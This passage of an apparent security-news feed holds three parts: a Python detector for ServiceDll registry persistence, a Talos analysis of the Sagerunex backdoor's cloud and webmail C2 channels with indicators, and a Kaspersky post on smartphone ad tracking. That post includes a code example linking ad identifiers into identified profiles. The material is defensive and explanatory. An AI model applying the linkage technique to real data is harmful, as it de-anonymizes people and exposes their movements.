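    return opts


def _normalize_path(path: str) -> str:
    """Lower-case and expand the common Windows root variables (assumed mapping)."""
    path = path.strip('"').lower()
    return path.replace("%systemroot%", "c:\\windows").replace("%windir%", "c:\\windows")


def scan_cmdline(cmd: str) -> Optional[Finding]:
    """Return a Finding for a suspicious 'reg add' on a Services key, else None."""
    tokens = shlex.split(cmd, posix=False)  # keep backslashes as-is
    if len(tokens) < 3 or tokens[0].lower() not in ("reg", "reg.exe") or tokens[1].lower() != "add":
        return None
    match = SERVICES_KEY.match(tokens[2].strip('"'))
    if not match:
        return None
    opts = _opts(tokens[3:])
    value, data, service = opts.get("/v", ""), opts.get("/d", ""), match.group("service")
    if match.group("params") and value.lower() == "servicedll":
        if not _normalize_path(data).startswith(SYSTEM_DLL_DIRS):
            return Finding("high", service, value, data, "ServiceDll points outside System32/SysWOW64")
        return Finding("medium", service, value, data, "ServiceDll rewritten with reg.exe")
    if not match.group("params") and value.lower() == "start" and data.lower() in ("2", "0x2"):
        return Finding("low", service, value, data, "service start type set to automatic")
    return None


def scan(cmdlines: List[str]) -> List[Finding]:
    """Scan a batch of command lines and keep only the findings."""
    return [f for f in map(scan_cmdline, cmdlines) if f is not None]


if __name__ == "__main__":
    for finding in scan(SAMPLE_CMDLINES):
        print(finding)
```

The medium tier is deliberate: an installer or sc.exe normally writes ServiceDll, so a reg.exe rewrite of that value deserves a look even when the DLL lands in System32, as with the appmgmts.dll line above.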

 

Sagerunex malware analysis 

In this section, we provide in-depth technical analysis of the multiple variants of the Sagerunex backdoor. Our exploration will begin with a detailed examination of a particular Sagerunex backdoor variant that exhibits a high degree of code similarity and workflow resemblance to those described in other vendors’ blog posts. This analysis will help establish connections and highlight the shared characteristics observed across different Sagerunex variants.  

 

Next, we will shift our focus to another intriguing variant of the Sagerunex backdoor, which utilizes Dropbox as its C2 server. This unconventional choice of a third-party cloud service illustrates the threat actor’s adaptability and efforts to evade detection. Additionally, we have identified another variant of the Sagerunex backdoor that leverages the Zimbra open-source webmail service for its C2 operations. This finding further underscores the diverse strategies Lotus Blossom employs to maintain control and persist within compromised environments. 

 

We examined the loader code similarity to identify numerous variants of the Sagerunex backdoor. By analyzing the loader and the behavior of the Sagerunex backdoor, we can classify the malware into the Sagerunex family. Despite the loader’s compact size and primary function of injecting the Sagerunex backdoor into memory, we have identified two distinct loader patterns. The first pattern involves the decryption algorithm: the loader embeds and encrypts the Sagerunex backdoor, utilizing a customized decryption process to extract it. The second pattern is the “servicemain” function, where the loader verifies its environment, ensuring it can only be executed as a service.  

 

Furthermore, we also observed the actor employ VMProtect, a software protection tool, to obfuscate Sagerunex code and evade detection by antivirus products. These sophisticated techniques are used to maintain the persistence of Sagerunex backdoor variants. 

 

Sagerunex malware similarity 

During its initial execution, Sagerunex conducts several checks before sending a beacon to its C2 server. These verification functions are present across all Sagerunex variants. The initial check involves searching for a debug log file in the temp folder. Regardless of whether this debug log file is present, all Sagerunex variants will proceed with execution. If the debug log is found, the backdoors encrypt the debug strings along with a timestamp and store them in the log file. Below is a screenshot displaying the debug file names for all Sagerunex variants. From left to right, the versions are: the “Beta” version, featuring clear debug strings within its code flow; the original version, previously discussed in another blog post, whose code flow is the same as the Beta version’s; the Dropbox and Twitter versions, which utilize these third-party cloud services as C2 channels; and finally, the Zimbra version, which employs the Zimbra webmail service for C2 purposes.


The second check verifies the existence of the backdoor configuration file in a specific directory under a designated filename. Below, we provide examples of the configuration file paths and filenames of the different Sagerunex versions uncovered during our research; we suspect there may be additional directories that remain undiscovered. These are ordered in the same manner as in the preceding paragraph.


Subsequently, the Sagerunex backdoor examines the system time to decide whether to execute its main function immediately or delay its execution. Each Sagerunex variant possesses its own time-check logic. For example, one variant checks if it operates during working hours (e.g. 10:00 am to 7:00 pm), while another ensures that the system hours do not exceed the system minutes. Despite these slight variations in check strategies among the Sagerunex backdoors, they all utilize the same pause API, “WaitForSingleObject,” and uniformly wait for 300,000 milliseconds before proceeding again with time-check logic. 

 

A final shared feature among all Sagerunex variants is their approach to proxy configuration, which enables the backdoor to successfully connect to the C2 server. While the malware includes several proxy-related functions, not all variants utilize every available option. Some rely solely on web proxy “autodiscovery” for accessing proxy services. Additionally, we identified hardcoded proxy servers, along with proxy usernames and passwords, within the Sagerunex configuration files. This discovery strongly supports our assessment that Lotus Blossom’s activities are intended for espionage purposes.  


Beta version of Sagerunex 

The Beta version of Sagerunex closely resembles the Sagerunex backdoor discussed previously in this post. However, this Beta version includes additional debug strings written as more complete sentences, which is why we call it the Beta version of Sagerunex. For example, as shown in the screenshot below, while typical Sagerunex debug strings often use “0x00” as a prefix followed by shortened error or behavior strings, the Beta version offers more detailed information, such as “Online Fail! Wait for %d mins\r\n”. Furthermore, this Beta version also gives us a clearer understanding of the Sagerunex workflow.

Fig. The left side is the Beta version of Sagerunex and the right side is typical Sagerunex. 

 

Once all the checks are bypassed, the Beta version of Sagerunex gathers information from the target host, including the hostname, MAC address, and IP address. It also queries the public IP address using “api.ipaddress[.]com.” This collected information is then encrypted and sent back to the C2 server. Upon receiving the encrypted data, Sagerunex decrypts it, successfully bringing the backdoor online and enabling the threat actor to control the target. Below are the debug strings indicating successful online status and the backdoor command functions. 

Fig. The left side is the online debug strings, and the right side is backdoor command functions.  

The Beta version of Sagerunex backdoor overall infection chain is visualized below. 


Dropbox & Twitter version of Sagerunex 

Talos also discovered another variant of Sagerunex backdoor that uses Dropbox and Twitter API as C2 services. After bypassing the initial checking steps, this backdoor variant retrieves the necessary Dropbox or Twitter tokens to successfully bring the backdoor online. Once the backdoor sends a beacon message and receives a response ID, it evaluates the ID number to determine subsequent actions. If the ID is less than 16, the function will return, prompting the backdoor to send another beacon message and wait for a new ID. If the ID is between 16 and 32, the backdoor proceeds to collect host information and execute paired backdoor command functions. After gathering the information and executing the commands, the backdoor encrypts and archives all collected data, then transmits it back to Dropbox or Twitter. When the ID received equals 39, the backdoor retrieves data from Dropbox files or Twitter status updates to confirm the status of the backdoor service. Below are the screenshots of Dropbox and Twitter connection testing function and this variant’s command functions. 

Fig. The left side is the online debug strings, and the right side is backdoor command functions. 

 

Additionally, our reverse engineering of this version of the Sagerunex backdoor revealed one intriguing finding. We discovered that the configuration file for this version not only includes Dropbox tokens and Twitter tokens but also reveals its original file path, which we believe may originate from the actor’s machine. Below, we provide a list of all the file paths we identified, along with a screenshot of the configuration file. 

  • C:\Users\aa\Desktop\dpst.dll
  • C:\Users\3\Desktop\DT-1-64-Gmsiscsii.dll
  • C:\Users\balabala\Desktop\swprve64.dll
  • C:\Users\test04\Desktop\adtsvc32.dll
  • C:\Users\USER\Documents\dtj32dj32.dll

Moreover, the timestamps on the Dropbox files and Twitter content indicate that this version of the backdoor was predominantly active between 2018 and 2022, and we assess that it might still be active now. This timeframe suggests a consistent pattern of use over several years, highlighting the longevity and persistence of this threat in the wild. Below is an example in which we extracted the file details from one of the Dropbox accounts.


The Dropbox & Twitter version of Sagerunex backdoor infection chain is visualized below. 


Zimbra webmail version of Sagerunex 

The final variant of the Sagerunex backdoor Talos discovered employs the Zimbra API to connect to a legitimate Zimbra mail service, using it as a C2 channel to exfiltrate victim information. Like other versions, this Sagerunex variant performs all the necessary checks before establishing its initial beacon connection. It uses the Zimbra webmail URL, along with a username and password, to log in and obtain an authentication token. Upon successfully acquiring this token, the backdoor synchronizes the account’s folders and documents and utilizes the search function API to verify the connection’s functionality. Once the connection and synchronization processes are complete, the backdoor gathers host information, encrypts it, and saves the data as “mail_report.rar”. The RAR file is then attached to a draft email in the account’s Drafts folder. With these steps finalized, the beacon connection is successfully established.


The Zimbra webmail version of Sagerunex is designed not only to collect victim information and send it to the Zimbra mailbox, but also to let the actor use Zimbra mail content to issue commands and control the victim machine. If the mailbox contains a valid command message, the backdoor downloads the content and extracts the command; otherwise it deletes the content and waits for a valid command. Once the command has finished executing, the backdoor packages the result and likewise saves it as “mail_report.rar”. This RAR file is then attached to a draft email in the account’s Trash folder.


Fig. The left side is the Zimbra status path, and the right side is the backdoor command functions.

Talos observed that this version of the Sagerunex backdoor has been active since 2019, and several Zimbra mailboxes are still receiving beacon information from compromised machines.
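As a hunting aid for the Drafts/Trash dead-drop behaviour described above, here is an added Python example (not Talos code) that runs over constructed Zimbra-style message metadata: it selects messages parked in the Drafts or Trash folders carrying an attachment named mail_report.rar and then, per account, counts how many such reports landed inside a sliding time window, which separates a mailbox that is still receiving beacons from an old one-off. The record fields, the seven-day window and the two-report threshold are assumptions of the example, not values from the write-up.

```python
"""Hunt for Sagerunex-style mailbox dead drops in Zimbra message metadata.

Added example, not Talos code. The message records are constructed; only the
Drafts/Trash usage and the 'mail_report.rar' name come from the write-up.
"""
from collections import defaultdict
from datetime import datetime, timedelta

SUSPECT_ATTACHMENT = "mail_report.rar"
DEAD_DROP_FOLDERS = {"Drafts", "Trash"}

# Constructed sample: the fields an admin-side message export might provide
# (account, folder, attachment names, ISO-8601 date). Addresses are made up.
MESSAGES = [
    {"account": "user1@example.test", "folder": "Drafts", "attachments": ["mail_report.rar"], "date": "2024-05-01T08:03:00"},
    {"account": "user1@example.test", "folder": "Trash",  "attachments": ["mail_report.rar"], "date": "2024-05-01T08:09:00"},
    {"account": "user1@example.test", "folder": "Trash",  "attachments": ["mail_report.rar"], "date": "2024-05-02T08:05:00"},
    {"account": "user2@example.test", "folder": "Inbox",  "attachments": ["report.pdf"],      "date": "2024-05-01T09:00:00"},
    {"account": "user3@example.test", "folder": "Drafts", "attachments": ["mail_report.rar"], "date": "2023-11-20T10:00:00"},
]


def dead_drop_hits(messages):
    """Messages parked in Drafts or Trash with the report archive attached."""
    return [
        m for m in messages
        if m["folder"] in DEAD_DROP_FOLDERS
        and any(a.lower() == SUSPECT_ATTACHMENT for a in m["attachments"])
    ]


def beaconing_accounts(messages, min_reports=2, window=timedelta(days=7)):
    """Per account: number of dead-drop hits, the densest count inside one
    window, the last-seen time, and whether it looks like a live beacon
    (threshold and window are assumptions of this example)."""
    times_by_account = defaultdict(list)
    for m in dead_drop_hits(messages):
        times_by_account[m["account"]].append(datetime.fromisoformat(m["date"]))
    summary = {}
    for account, times in times_by_account.items():
        times.sort()
        densest, start = 1, 0
        for end in range(len(times)):          # sliding window over sorted times
            while times[end] - times[start] > window:
                start += 1
            densest = max(densest, end - start + 1)
        summary[account] = {
            "hits": len(times),
            "max_in_window": densest,
            "last_seen": times[-1].isoformat(),
            "live": densest >= min_reports,
        }
    return summary


if __name__ == "__main__":
    for account, info in beaconing_accounts(MESSAGES).items():
        print(account, info)
```

Run against a real export, the "live" accounts are the ones to pull the draft attachments from first; a single old hit such as user3 above still deserves a look, since the write-up dates this variant back to 2019.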


The Zimbra version of Sagerunex backdoor infection chain is visualized below. 


Coverage 


Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here. 

Cisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks. 

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat. 

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products. 

Umbrella, Cisco’s secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them. 

Additional protection with context for your specific environment and threat data is available from the Firewall Management Center.

Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network. 

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org. Snort SIDs for this threat are 64511, 64510, 64509. 

ClamAV detections are also available for this threat: 

Win.Backdoor.Sagerunex-10041845-0 

Win.Tool.Mtrain-10041846-0 

Win.Tool.Ntfsdump-10041854-0 

Win.Backdoor.Sagerunex-10041857-0 

 

Indicators of compromise (IOCs) 

Campaign code 

st
qaz
test
cmhk
dtemp
0305
4007
4007_new
Jf_b64_t1
Ber_64
0817-svc64
NSX32-0710
Nsx32-0419
NJX32-0710
WS1x321014
pccw-svc32
CTMsx32-0712

IOCs for this research can also be found at our GitHub repository here

Cisco Talos Blog – Read More

How smartphones actually track you | Kaspersky official blog

You’ve probably heard the rumor — our smartphones are always listening. But the truth is, they don’t need to. The information shared with data brokers by virtually every app on your smartphone — from games to weather apps — is more than enough to create a detailed profile on you. For a long time, “online tracking” meant that search engines, ad systems, and advertisers all knew which websites you visited. But since smartphones appeared on the scene, the situation has become much worse: now advertisers know where you go physically and how often. So, how do they do it?

Every time any mobile app prepares to show an ad, a lightning-fast auction takes place to determine which specific ad you’ll see based on the data sent from your smartphone. And although you only see the winning ad, all the participants in the auction receive data about the potential viewer — that is, you. A recent experiment showed just how many companies receive this information, how detailed it is, and how ineffective built-in smartphone features like “Do Not Track” and “Opt Out of Personalized Ads” are at protecting users. Nevertheless, we still recommend some protection methods!

What data do advertisers receive?

Every mobile app is built differently, but most start “leaking” data to ad networks even before displaying any ads. In the experiment mentioned earlier, a mobile game immediately sent an extensive array of data to the Unity Ads network upon launch:

  • Information about the smartphone, including OS version, battery level, brightness and volume settings, and available memory
  • Data about the network operator
  • Type of internet connection
  • Full IP address of the device
  • Vendor code (the game developer’s identifier)
  • Unique user code (IFV) — an identifier linked to the game developer and used by an ad system
  • Another unique user code (IDFA/AAID) — an ad identifier shared by all apps on the smartphone
  • Current location
  • Consent for ad tracking (yes/no)

Interestingly, the location is transmitted even if the service is disabled on the smartphone. It’s approximate though, calculated based on the IP address. However, with publicly available databases matching physical and internet addresses, this approximation can be surprisingly accurate — down to the city district or even the building. If location services are enabled and allowed for the app, precise location data is transmitted.

In the same experiment, the consent for ad tracking was marked as “User Agreed”, even though the experiment’s author did not provide such consent.

Who gets the data, and how often?

The data stream is sent to all ad platforms integrated into the app. There are often several such platforms, and a complex algorithm determines which one will be used to show the ad. However, some data is shared with all connected networks — even those that aren’t currently showing ads. In addition to the above-mentioned Unity (whose ad platform generates 66% of revenue for developers using this game engine), other major platforms include those of Facebook, Microsoft, Google, Apple, Amazon, and dozens of specialized companies like ironSource.

Next, the ad network currently displaying ads in the app sends a large set of user-data to a real-time bidding system (RTB). Here, various advertisers analyze the data and bid to display their ads, all at lightning-fast speeds. You view the winning ad, but information about your location, combined with the exact time, IP address, and all other data, is shared with every auction participant. According to the experiment’s author, this data is collected by hundreds of obscure firms, some of which may be shell companies owned by intelligence agencies.

This video from the experiment shows how connections to ad servers were made dozens of times per second, and even Facebook received data despite the fact that no Meta apps were installed on the experimenter’s smartphone.

The illusion of anonymity

Ad-network owners love to claim that they use anonymous and depersonalized data for ad targeting. In reality, advertising systems go to great lengths to accurately identify users across different apps and devices.

In the data set mentioned above, two different user codes are listed: IFV and IDFA/AAID (IDFA for Apple, AAID for Android). A separate IFV is assigned to your device by each app developer. If you have three games from the same developer, each of these games will send the same IFV when showing ads. Meanwhile, apps from other developers will send their own IFVs. The IDFA/AAID, on the other hand, is a unique advertising identifier assigned to the entire smartphone. If you’ve agreed to “ad personalization” in your phone’s settings, all games and apps on your device will use the same IDFA/AAID.

If you disable ad personalization, or decline consent, the IDFA/AAID is replaced with zeros. But IFVs will continue to be sent. By combining the data transmitted with each ad display, advertising networks can piece together a detailed dossier on “anonymous” users, linking their activity across different apps through these identifiers. And as soon as the user enters their email address, phone number, payment details, or home address anywhere — such as when making an online purchase — the anonymous identifier can be linked to this personal information.
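To make the IFV/IDFA distinction concrete, here is an added Python example (not from the Kaspersky post) built on constructed ad-request records with made-up identifiers. It links records through the device-wide IDFA/AAID when that is present and through the per-developer IFV otherwise, and can additionally join on the IP address and coarse location that every request carries (a simplification of how brokers correlate; treat that join as an assumption). With the IDFA zeroed, the two games from the same developer still collapse into one profile, and one record carrying an e-mail address de-anonymizes the whole linked cluster.

```python
"""Link "anonymous" ad-request records through IFV and IDFA/AAID.

Added example; the records and identifiers are constructed, not real telemetry.
"""
from collections import defaultdict

# A zeroed IDFA/AAID is what the ad SDK sends when personalization is off.
ZERO_IDFA = "00000000-0000-0000-0000-000000000000"

# Constructed sample: one record per ad request. "geo" stands in for the coarse
# location derived from the IP; "email" is only known once the user typed it
# somewhere (here: a purchase in the shopping app). Records 1-4 are one device.
RECORDS = [
    {"app": "puzzle",  "vendor": "dev-A", "ifv": "ifv-A-7", "idfa": ZERO_IDFA, "ip": "203.0.113.7",  "geo": "district-12", "email": None},
    {"app": "runner",  "vendor": "dev-A", "ifv": "ifv-A-7", "idfa": ZERO_IDFA, "ip": "203.0.113.7",  "geo": "district-12", "email": None},
    {"app": "weather", "vendor": "dev-B", "ifv": "ifv-B-9", "idfa": ZERO_IDFA, "ip": "203.0.113.7",  "geo": "district-12", "email": None},
    {"app": "shop",    "vendor": "dev-C", "ifv": "ifv-C-3", "idfa": ZERO_IDFA, "ip": "203.0.113.7",  "geo": "district-12", "email": "mr.x@example.com"},
    {"app": "puzzle",  "vendor": "dev-A", "ifv": "ifv-A-2", "idfa": ZERO_IDFA, "ip": "198.51.100.4", "geo": "district-40", "email": None},
]


class _UnionFind:
    """Minimal disjoint-set structure over record indices."""

    def __init__(self, n):
        self.parent = list(range(n))

    def find(self, i):
        while self.parent[i] != i:
            self.parent[i] = self.parent[self.parent[i]]
            i = self.parent[i]
        return i

    def union(self, a, b):
        ra, rb = self.find(a), self.find(b)
        if ra != rb:
            self.parent[rb] = ra


def id_keys(rec):
    """Join keys an ad network has: the per-developer IFV always, the
    device-wide IDFA/AAID only when it has not been zeroed."""
    keys = [("ifv", rec["vendor"], rec["ifv"])]
    if rec["idfa"] != ZERO_IDFA:
        keys.append(("idfa", rec["idfa"]))
    return keys


def id_and_network_keys(rec):
    """Same, plus the IP/coarse-location pair (assumed join; real brokers
    also use timestamps and precise location)."""
    return id_keys(rec) + [("net", rec["ip"], rec["geo"])]


def link_profiles(records, keys_for):
    """Group records sharing any join key; return one profile per group with
    the apps seen and the identity (e-mail) if any member record had one."""
    uf = _UnionFind(len(records))
    first_seen = {}
    for i, rec in enumerate(records):
        for key in keys_for(rec):
            if key in first_seen:
                uf.union(first_seen[key], i)
            else:
                first_seen[key] = i
    groups = defaultdict(set)
    for i in range(len(records)):
        groups[uf.find(i)].add(i)
    profiles = []
    for members in groups.values():
        apps = sorted(records[i]["app"] for i in members)
        emails = sorted(records[i]["email"] for i in members if records[i]["email"])
        profiles.append({"apps": apps, "identity": emails[0] if emails else None})
    return sorted(profiles, key=lambda p: p["apps"])


def personalized(records, idfa):
    """The same records as they look with ad personalization on: every app on
    the device sends one shared IDFA/AAID."""
    return [dict(rec, idfa=idfa) for rec in records]


if __name__ == "__main__":
    for label, keys in (("identifiers only", id_keys), ("plus IP/location", id_and_network_keys)):
        print(label)
        for profile in link_profiles(RECORDS, keys):
            print("  ", profile)
```

The design point is that zeroing the IDFA only removes one key from the join; the IFV and network keys remain, which is what the "tenth of a measure" remark below refers to.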

As we discussed in our article on the Gravy Analytics data leak, location data is so valuable that some companies posing as ad brokers are created solely to collect it. Thanks to IFV — especially IDFA/AAID — it’s possible to map out the movements of “Mr. X” and often de-anonymize him using just this data.

Sometimes, complex movement analysis isn’t even necessary. Databases linking ad identifiers to full names, home addresses, emails, and other highly personal details can be simply sold by unscrupulous brokers. In such cases, detailed personal data and a comprehensive location history form a complete dossier on the user.

How to protect yourself from ad tracking

In practice, neither strict laws like the GDPR nor built-in privacy settings provide complete protection against the tracking methods described above. Simply pressing a button in an app to disable ad personalization is not even a half-measure — it’s more like a tenth of a measure. The fact is, this only removes one identifier from the telemetry data, while the rest of your data is still sent to advertisers.

Cases like the Gravy Analytics data leak and the scandal involving the Datastream data broker demonstrate the scale of the problem. The ad-tracking industry is enormous, and it exploits almost any app — not just games. Moreover, location data is purchased by a wide range of entities — from advertising firms to intelligence agencies. Sometimes, hackers obtain this information for free if a data broker fails to adequately protect their databases. To minimize the exposure of your data to such leaks, you’ll need to take some significant precautions:

  • Only allow location access for apps that genuinely need it for their primary function (e.g., navigation apps, maps, or taxi services). For example, delivery services or banking apps don’t actually need your location to function — let alone games or shopping apps. You can always manually enter a delivery address.
  • In general, grant apps the minimum permissions necessary. Do not allow them to track your activity in other apps, and do not grant full access to your photo gallery. Malware has been developed that can analyze photo data using AI, and unscrupulous app developers could potentially do the same. Additionally, all photos taken on your smartphone include geotags by default, among other information.
  • Configure a secure DNS service with ad-filtering functionality on your smartphone. This will block a significant amount of advertising telemetry.
  • Try to use apps that don’t contain ads. These are typically either FOSS (Free Open Source Software) apps or paid applications.
  • On iOS, disable the use of the advertising identifier. On Android, delete or reset it at least once a month (unfortunately, it cannot be completely disabled). Remember, these actions reduce the amount of information collected about you but don’t entirely eliminate tracking.
  • Where possible, avoid using “Sign in with Google” or other similar services in apps. Try to use apps without creating an account. This makes it harder for advertisers to collate your activity across different apps and services into a unified advertising profile.
  • Minimize the number of apps you have on your smartphone, and regularly delete unused apps — they can still track you even if you’re not actively using them.
  • Use robust security solutions on all your devices, such as Kaspersky Premium. This helps protect you from more aggressive apps, whose advertising modules can be as malicious as spyware.
  • In the Kaspersky settings in your smartphone, activate the Anti-Banner and Private Browsing options on iOS, or Safe Browsing on Android. This makes it significantly more difficult to track you.

If smartphone surveillance doesn’t concern you yet, here are some chilling stories about who is spying on us and how:

Kaspersky official blog – Read More